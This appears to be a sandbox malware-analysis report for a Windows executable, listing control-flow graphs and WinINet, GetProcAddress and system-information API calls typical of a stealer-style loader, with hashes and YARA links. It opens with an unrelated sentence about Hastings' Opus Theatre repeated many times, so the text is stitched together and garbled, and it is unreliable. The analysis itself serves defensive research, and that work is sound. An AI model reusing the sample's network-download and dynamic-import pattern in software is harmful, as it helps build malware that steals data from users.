2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: a81d05cd8638580f9db8d2126d3134f056d3ceba72e87563ac11e2cfaaacd55d
                                    • Instruction ID: 52c0697fe6f5a4b4df179c37745aeb59c3798d53b200952b04644b148912a4b0
                                    • Opcode Fuzzy Hash: a81d05cd8638580f9db8d2126d3134f056d3ceba72e87563ac11e2cfaaacd55d
                                    • Instruction Fuzzy Hash: 9D41BD707C270C7BC624FBAC888EE9D76B79F4B700F596148AA13562C2CBB06D404E66
                                    Function 006862D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 6862d0-68635b call 69aab0 call 684800 call 69aa50 InternetOpenA StrCmpCA 1040 68635d 1033->1040 1041 686364-686368 1033->1041 1040->1041 1042 686559-686575 call 69aab0 call 69ab10 * 2 1041->1042 1043 68636e-686392 InternetConnectA 1041->1043 1061 686578-68657d 1042->1061 1044 686398-68639c 1043->1044 1045 68654f-686553 InternetCloseHandle 1043->1045 1047 6863aa 1044->1047 1048 68639e-6863a8 1044->1048 1045->1042 1051 6863b4-6863e2 HttpOpenRequestA 1047->1051 1048->1051 1053 6863e8-6863ec 1051->1053 1054 686545-686549 InternetCloseHandle 1051->1054 1056 6863ee-68640f InternetSetOptionA 1053->1056 1057 686415-686455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 68647c-68649b call 698ad0 1057->1059 1060 686457-686477 call 69aa50 call 69ab10 * 2 1057->1060 1067 686519-686539 call 69aa50 call 69ab10 * 2 1059->1067 1068 68649d-6864a4 1059->1068 1060->1061 1067->1061 1071 6864a6-6864d0 InternetReadFile 1068->1071 1072 686517-68653f InternetCloseHandle 1068->1072 1076 6864db 1071->1076 1077 6864d2-6864d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 6864dd-686515 call 69acc0 call 69abb0 call 69ab10 1077->1080 1080->1071
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    • InternetOpenA.WININET(006A0DFF,00000001,00000000,00000000,00000000), ref: 00686331
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0142D6B0,00000000,00000000,00400100,00000000), ref: 006863D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0068640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00686421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0068644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006864BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0068653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00686549
                                    • InternetCloseHandle.WININET(00000000), ref: 00686553
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: e48874a8eb41b7087de91d32baef0c4e49dfd02c2f732d14a960591d18f09c57
                                    • Instruction ID: dd6e39fa9beb876a344aef583e85e2c4e59533334fa0c7d5488fedda0fedf460
                                    • Opcode Fuzzy Hash: e48874a8eb41b7087de91d32baef0c4e49dfd02c2f732d14a960591d18f09c57
                                    • Instruction Fuzzy Hash: 92716071A04318ABDF24EFD0DC55FEEB7BAAB44700F108198F1066B594DBB06A84CF55
                                    Function 00697690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 697690-6976da GetWindowsDirectoryA 1357 6976dc 1356->1357 1358 6976e3-697757 GetVolumeInformationA call 698e90 * 3 1356->1358 1357->1358 1365 697768-69776f 1358->1365 1366 69778c-6977a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 697771-69778a call 698e90 1365->1367 1368 6977a9-6977b6 call 69aa50 1366->1368 1369 6977b8-6977e8 wsprintfA call 69aa50 1366->1369 1367->1365 1377 69780e-69781e 1368->1377 1369->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006976D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0069770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0069779A
                                    • wsprintfA.USER32 ref: 006977D0
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 7414a451ee1560dcbd362a5c6daca65ba49dc6fa01f0e4b18caa327bd2ad0bf7
                                    • Instruction ID: 017037a249ea8f16e451dcaee0dc49cfea5fb575808d66e6f1a99d2b3cf81fa1
                                    • Opcode Fuzzy Hash: 7414a451ee1560dcbd362a5c6daca65ba49dc6fa01f0e4b18caa327bd2ad0bf7
                                    • Instruction Fuzzy Hash: 8341A3B1D18348ABDF10DF94DC85BDEBBB9AF08704F100099F609AB680D7756B44CBA5
                                    Function 006979E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006811B7), ref: 00697A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00697A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 25e0953991751fc0c659d6a1922e1e9f45d43755613f48a2f34b5c6dac30368b
                                    • Instruction ID: 47d93450cac80ed5d28d6f35bb8316f492d644e735b83ef5eae6d67bec448942
                                    • Opcode Fuzzy Hash: 25e0953991751fc0c659d6a1922e1e9f45d43755613f48a2f34b5c6dac30368b
                                    • Instruction Fuzzy Hash: 36F04FB1958309EFCB00DFD9ED45BAEFBBCEB05711F10021AF615A2680C7751A008BA1
                                    Function 00681160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 472ad8a4a0dfc1ca8b4d54486fd3ae4d6c54a8222f45c88c002ba3861ca551da
                                    • Instruction ID: fe2f17a10795040539fcb107e2bee7f3ee1571f7f7f92ef35a6e702ccf219dfd
                                    • Opcode Fuzzy Hash: 472ad8a4a0dfc1ca8b4d54486fd3ae4d6c54a8222f45c88c002ba3861ca551da
                                    • Instruction Fuzzy Hash: BBD05E7490C30C9BCB00EFE1A8896DDBB78BB08216F000594D90562340EA306581CB65
                                    Function 00699F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 699f20-699f2a 634 699f30-69a341 GetProcAddress * 43 633->634 635 69a346-69a3da LoadLibraryA * 8 633->635 634->635 636 69a3dc-69a451 GetProcAddress * 5 635->636 637 69a456-69a45d 635->637 636->637 638 69a463-69a521 GetProcAddress * 8 637->638 639 69a526-69a52d 637->639 638->639 640 69a5a8-69a5af 639->640 641 69a52f-69a5a3 GetProcAddress * 5 639->641 642 69a5b5-69a642 GetProcAddress * 6 640->642 643 69a647-69a64e 640->643 641->640 642->643 644 69a72f-69a736 643->644 645 69a654-69a72a GetProcAddress * 9 643->645 646 69a738-69a7ad GetProcAddress * 5 644->646 647 69a7b2-69a7b9 644->647 645->644 646->647 648 69a7bb-69a7e7 GetProcAddress * 2 647->648 649 69a7ec-69a7f3 647->649 648->649 650 69a825-69a82c 649->650 651 69a7f5-69a820 GetProcAddress * 2 649->651 652 69a922-69a929 650->652 653 69a832-69a91d GetProcAddress * 10 650->653 651->650 654 69a92b-69a988 GetProcAddress * 4 652->654 655 69a98d-69a994 652->655 653->652 654->655 656 69a9ae-69a9b5 655->656 657 69a996-69a9a9 GetProcAddress 655->657 658 69aa18-69aa19 656->658 659 69a9b7-69aa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,014167C0), ref: 00699F3D
                                    • GetProcAddress.KERNEL32(75900000,014168C0), ref: 00699F55
                                    • GetProcAddress.KERNEL32(75900000,014294E8), ref: 00699F6E
                                    • GetProcAddress.KERNEL32(75900000,01429260), ref: 00699F86
                                    • GetProcAddress.KERNEL32(75900000,0142CDA8), ref: 00699F9E
                                    • GetProcAddress.KERNEL32(75900000,0142CC88), ref: 00699FB7
                                    • GetProcAddress.KERNEL32(75900000,0141B1F8), ref: 00699FCF
                                    • GetProcAddress.KERNEL32(75900000,0142CCE8), ref: 00699FE7
                                    • GetProcAddress.KERNEL32(75900000,0142CD48), ref: 0069A000
                                    • GetProcAddress.KERNEL32(75900000,0142CD00), ref: 0069A018
                                    • GetProcAddress.KERNEL32(75900000,0142CCD0), ref: 0069A030
                                    • GetProcAddress.KERNEL32(75900000,014169A0), ref: 0069A049
                                    • GetProcAddress.KERNEL32(75900000,01416900), ref: 0069A061
                                    • GetProcAddress.KERNEL32(75900000,01416680), ref: 0069A079
                                    • GetProcAddress.KERNEL32(75900000,014166C0), ref: 0069A092
                                    • GetProcAddress.KERNEL32(75900000,0142CC40), ref: 0069A0AA
                                    • GetProcAddress.KERNEL32(75900000,0142CDC0), ref: 0069A0C2
                                    • GetProcAddress.KERNEL32(75900000,0141B130), ref: 0069A0DB
                                    • GetProcAddress.KERNEL32(75900000,014166E0), ref: 0069A0F3
                                    • GetProcAddress.KERNEL32(75900000,0142CD30), ref: 0069A10B
                                    • GetProcAddress.KERNEL32(75900000,0142CCA0), ref: 0069A124
                                    • GetProcAddress.KERNEL32(75900000,0142CD18), ref: 0069A13C
                                    • GetProcAddress.KERNEL32(75900000,0142CC58), ref: 0069A154
                                    • GetProcAddress.KERNEL32(75900000,01416700), ref: 0069A16D
                                    • GetProcAddress.KERNEL32(75900000,0142CD60), ref: 0069A185
                                    • GetProcAddress.KERNEL32(75900000,0142CC10), ref: 0069A19D
                                    • GetProcAddress.KERNEL32(75900000,0142CCB8), ref: 0069A1B6
                                    • GetProcAddress.KERNEL32(75900000,0142CD78), ref: 0069A1CE
                                    • GetProcAddress.KERNEL32(75900000,0142CD90), ref: 0069A1E6
                                    • GetProcAddress.KERNEL32(75900000,0142CC28), ref: 0069A1FF
                                    • GetProcAddress.KERNEL32(75900000,0142CC70), ref: 0069A217
                                    • GetProcAddress.KERNEL32(75900000,0142C808), ref: 0069A22F
                                    • GetProcAddress.KERNEL32(75900000,0142C760), ref: 0069A248
                                    • GetProcAddress.KERNEL32(75900000,0141F610), ref: 0069A260
                                    • GetProcAddress.KERNEL32(75900000,0142C6D0), ref: 0069A278
                                    • GetProcAddress.KERNEL32(75900000,0142C7A8), ref: 0069A291
                                    • GetProcAddress.KERNEL32(75900000,01416760), ref: 0069A2A9
                                    • GetProcAddress.KERNEL32(75900000,0142C868), ref: 0069A2C1
                                    • GetProcAddress.KERNEL32(75900000,014167A0), ref: 0069A2DA
                                    • GetProcAddress.KERNEL32(75900000,0142C730), ref: 0069A2F2
                                    • GetProcAddress.KERNEL32(75900000,0142C700), ref: 0069A30A
                                    • GetProcAddress.KERNEL32(75900000,01416500), ref: 0069A323
                                    • GetProcAddress.KERNEL32(75900000,014164C0), ref: 0069A33B
                                    • LoadLibraryA.KERNEL32(0142C658,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A34D
                                    • LoadLibraryA.KERNEL32(0142C628,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A35E
                                    • LoadLibraryA.KERNEL32(0142C8B0,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A370
                                    • LoadLibraryA.KERNEL32(0142C778,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A382
                                    • LoadLibraryA.KERNEL32(0142C6E8,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A393
                                    • LoadLibraryA.KERNEL32(0142C670,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A3A5
                                    • LoadLibraryA.KERNEL32(0142C8E0,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A3B7
                                    • LoadLibraryA.KERNEL32(0142C7C0,?,00695EF3,006A0AEB,?,?,?,?,?,?,?,?,?,?,006A0AEA,006A0AE7), ref: 0069A3C8
                                    • GetProcAddress.KERNEL32(75FD0000,014164E0), ref: 0069A3EA
                                    • GetProcAddress.KERNEL32(75FD0000,0142C640), ref: 0069A402
                                    • GetProcAddress.KERNEL32(75FD0000,01429148), ref: 0069A41A
                                    • GetProcAddress.KERNEL32(75FD0000,0142C790), ref: 0069A433
                                    • GetProcAddress.KERNEL32(75FD0000,014164A0), ref: 0069A44B
                                    • GetProcAddress.KERNEL32(73550000,0141B248), ref: 0069A470
                                    • GetProcAddress.KERNEL32(73550000,014163E0), ref: 0069A489
                                    • GetProcAddress.KERNEL32(73550000,0141B0E0), ref: 0069A4A1
                                    • GetProcAddress.KERNEL32(73550000,0142C688), ref: 0069A4B9
                                    • GetProcAddress.KERNEL32(73550000,0142C6A0), ref: 0069A4D2
                                    • GetProcAddress.KERNEL32(73550000,014165A0), ref: 0069A4EA
                                    • GetProcAddress.KERNEL32(73550000,014163A0), ref: 0069A502
                                    • GetProcAddress.KERNEL32(73550000,0142C8F8), ref: 0069A51B
                                    • GetProcAddress.KERNEL32(763B0000,01416380), ref: 0069A53C
                                    • GetProcAddress.KERNEL32(763B0000,01416280), ref: 0069A554
                                    • GetProcAddress.KERNEL32(763B0000,0142C8C8), ref: 0069A56D
                                    • GetProcAddress.KERNEL32(763B0000,0142C610), ref: 0069A585
                                    • GetProcAddress.KERNEL32(763B0000,01416480), ref: 0069A59D
                                    • GetProcAddress.KERNEL32(750F0000,0141B270), ref: 0069A5C3
                                    • GetProcAddress.KERNEL32(750F0000,0141AFC8), ref: 0069A5DB
                                    • GetProcAddress.KERNEL32(750F0000,0142C880), ref: 0069A5F3
                                    • GetProcAddress.KERNEL32(750F0000,01416320), ref: 0069A60C
                                    • GetProcAddress.KERNEL32(750F0000,01416520), ref: 0069A624
                                    • GetProcAddress.KERNEL32(750F0000,0141B298), ref: 0069A63C
                                    • GetProcAddress.KERNEL32(75A50000,0142C718), ref: 0069A662
                                    • GetProcAddress.KERNEL32(75A50000,01416420), ref: 0069A67A
                                    • GetProcAddress.KERNEL32(75A50000,01429058), ref: 0069A692
                                    • GetProcAddress.KERNEL32(75A50000,0142C838), ref: 0069A6AB
                                    • GetProcAddress.KERNEL32(75A50000,0142C6B8), ref: 0069A6C3
                                    • GetProcAddress.KERNEL32(75A50000,014165C0), ref: 0069A6DB
                                    • GetProcAddress.KERNEL32(75A50000,01416640), ref: 0069A6F4
                                    • GetProcAddress.KERNEL32(75A50000,0142C748), ref: 0069A70C
                                    • GetProcAddress.KERNEL32(75A50000,0142C7D8), ref: 0069A724
                                    • GetProcAddress.KERNEL32(75070000,01416340), ref: 0069A746
                                    • GetProcAddress.KERNEL32(75070000,0142C7F0), ref: 0069A75E
                                    • GetProcAddress.KERNEL32(75070000,0142C820), ref: 0069A776
                                    • GetProcAddress.KERNEL32(75070000,0142C850), ref: 0069A78F
                                    • GetProcAddress.KERNEL32(75070000,0142C898), ref: 0069A7A7
                                    • GetProcAddress.KERNEL32(74E50000,01416540), ref: 0069A7C8
                                    • GetProcAddress.KERNEL32(74E50000,01416560), ref: 0069A7E1
                                    • GetProcAddress.KERNEL32(75320000,01416400), ref: 0069A802
                                    • GetProcAddress.KERNEL32(75320000,0142CA30), ref: 0069A81A
                                    • GetProcAddress.KERNEL32(6F060000,014162A0), ref: 0069A840
                                    • GetProcAddress.KERNEL32(6F060000,01416660), ref: 0069A858
                                    • GetProcAddress.KERNEL32(6F060000,01416440), ref: 0069A870
                                    • GetProcAddress.KERNEL32(6F060000,0142CBB0), ref: 0069A889
                                    • GetProcAddress.KERNEL32(6F060000,014163C0), ref: 0069A8A1
                                    • GetProcAddress.KERNEL32(6F060000,01416580), ref: 0069A8B9
                                    • GetProcAddress.KERNEL32(6F060000,01416360), ref: 0069A8D2
                                    • GetProcAddress.KERNEL32(6F060000,014162C0), ref: 0069A8EA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0069A901
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0069A917
                                    • GetProcAddress.KERNEL32(74E00000,0142C928), ref: 0069A939
                                    • GetProcAddress.KERNEL32(74E00000,01429178), ref: 0069A951
                                    • GetProcAddress.KERNEL32(74E00000,0142CAD8), ref: 0069A969
                                    • GetProcAddress.KERNEL32(74E00000,0142C9A0), ref: 0069A982
                                    • GetProcAddress.KERNEL32(74DF0000,01416460), ref: 0069A9A3
                                    • GetProcAddress.KERNEL32(6F9C0000,0142CA18), ref: 0069A9C4
                                    • GetProcAddress.KERNEL32(6F9C0000,014165E0), ref: 0069A9DD
                                    • GetProcAddress.KERNEL32(6F9C0000,0142CB20), ref: 0069A9F5
                                    • GetProcAddress.KERNEL32(6F9C0000,0142C940), ref: 0069AA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
